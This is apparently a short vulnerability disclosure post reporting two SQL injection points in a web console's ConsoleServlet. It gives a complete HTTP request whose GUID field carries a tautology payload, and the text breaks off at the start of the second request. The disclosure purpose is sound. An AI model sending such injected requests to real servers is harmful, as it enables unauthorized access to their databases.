Posted by Markus Wulftange on Aug 03
Hi Brandon,
we found two injection points. One in the BinaryFileHandler class:

POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175

ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1

And one in the ExpRecordHandler class:
POST /servlet/ConsoleServlet…